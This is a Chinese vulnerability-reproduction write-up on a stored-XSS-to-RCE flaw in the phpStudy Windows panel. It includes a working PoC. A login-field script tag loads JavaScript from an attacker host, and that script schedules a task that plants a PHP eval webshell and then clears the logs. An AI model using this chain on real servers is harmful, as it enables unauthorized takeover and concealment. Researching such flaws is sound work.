phpStudy 小皮 Windows面板 RCE漏洞

简介: 详情看文章内叙述

声明


本篇文章仅用于漏洞复现技术研究,切勿将文中涉及攻击手法用于非授权下的渗透行为,出现任何后果与本文章作者无关,切记!!!


一、漏洞描述


Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE。


二、漏洞复现


首先去官网下载最新版的小皮Windows面板安装包程序

下载地址:https://www.xp.cn/windows-panel.html

image.png

本地环境安装

image.png

安装完成之后会弹出一个txt文档,里面包含访问地址,如下所示

image.png

访问系统面板,出现如下登录界面

image.png

首先在用户名登录的地方输入XSS代码验证是否存在漏洞

image.png

接着使用正确的账号密码进行登录,加载完成之后,出现弹窗。

image.png

如上图可以看到确实触发XSS弹窗,这是因为整个系统在加载的过程中会读取操作日志的内容,刚刚在用户名处插入的语句就是为了让系统操作日志进行记录以便登录成功之后加载js代码脚本,所以执行显示了登录系统失败。

image.png

在当前这个系统界面上有一个计划任务的功能,其中可以执行系统命令,所以结合登录处的XSS漏洞可以通过写入计划任务来达到命令执行的目的。


操作步骤如下:

在本地使用python开启一个http服务,并且将poc脚本放在服务目录下进行利用。

image.png

image.png

POC


function poc(){

 $.get('/service/app/tasks.php?type=task_list',{},function(data){

   var id=data.data[0].ID;

   $.post('/service/app/tasks.php?type=exec_task',{

     tid:id

   },function(res2){

       $.post('/service/app/log.php?type=clearlog',{

         

       },function(res3){},"json");

     

   

   },"json");

 },"json");

}

function save(){

 var data=new Object();

 data.task_id="";

 data.title="test";

 data.exec_cycle="1";

 data.week="1";

 data.day="3";

 data.hour="14";

 data.minute = "20";

 data.shell='echo "<?php @eval($_POST[123]);?>" >D:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';

 $.post('/service/app/tasks.php?type=save_shell',data,function(res){

   poc();

 },'json');

}

save();


PS:这里需要清空日志,避免重复触发。

紧接着在登录处用户名框中插入如下代码


  • <script src=http://X.X.X.X:8000/poc.js></script>

image.png

操作完成后,只要管理员登录到系统,插入的XSS代码就可以写入计划任务并执行,通过计划任务就可以在服务器上写入文件。

当管理员登录成功后,就会在对应路径下产生一个 1.php文件(文件内容自行定义)

image.png

image.png

因为小皮windows面板这个应用系统类似于宝塔,所以其中会部署网站

image.png

当文件写入完成后,即可通过WebShell管理工具进行连接。

image.png

目录
相关文章
|
5月前
|
网络协议 网络架构 Windows
【Windows】MCSM面板搭建Mycraft服务器,实现公网远程联机
【Windows】MCSM面板搭建Mycraft服务器,实现公网远程联机
202 0
|
2月前
|
监控 安全 虚拟化
降级攻击可“复活”数以千计的Windows漏洞
在本周举行的黑帽大会(Black Hat 2024)上,安全研究员Alon Leviev曝光了一个微软Windows操作系统的“超级漏洞”,该漏洞使得攻击者可以利用微软更新进程实施降级攻击,“复活”数以千计的微软Windows漏洞,即便是打满补丁的Windows11设备也将变得千疮百孔,脆弱不堪。
|
2月前
|
负载均衡 网络协议 安全
【Azure 应用服务】Azure Web App的服务(基于Windows 操作系统部署)在被安全漏洞扫描时发现了TCP timestamps漏洞
【Azure 应用服务】Azure Web App的服务(基于Windows 操作系统部署)在被安全漏洞扫描时发现了TCP timestamps漏洞
|
3月前
|
安全 Windows
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
46 2
|
安全 测试技术 Windows
Windows Ancillary Function Driver for WinSock 权限提升漏洞(CVE-2023-21768)
Windows Ancillary Function Driver for WinSock 存在权限提升漏洞
259 1
|
存储 安全 API
Windows Server 2022 21H2 本地域权限提升漏洞(PetitPotam)
Windows Server 2022 Standard/Datacenter 存在本地域权限提升漏洞,攻击者可通过使用PetitPotam工具进行获取服务器SYSTEM权限。
239 1
|
5月前
|
安全 Windows
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
60 0
|
5月前
|
弹性计算 网络安全 Apache
windows server2012服务器下PHPstudy配置ssl证书(https配置)
windows server2012服务器下PHPstudy配置ssl证书(https配置)
151 0
|
安全 测试技术 数据安全/隐私保护
CVE-2022-21999 Windows Print Spooler(打印服务)特权提升漏洞
2021年6⽉29⽇,安全研究⼈员在GitHub上公开了CVE-2021-1675 Windows Print Spooler远程代码执⾏漏洞的PoC。该漏洞是Microsoft 6⽉星期⼆补丁⽇中公开的⼀个RCE漏洞,其存在于管理打印过程的Print Spooler (spoolsv.exe) 服务中,会影响所有 Windows系统版本。
115 1
|
网络协议 关系型数据库 MySQL
01靶场环境搭建(Windows2008系统安装优化及phpstudy安装、cms)
01靶场环境搭建(Windows2008系统安装优化及phpstudy安装、cms)
192 0
下一篇
无影云桌面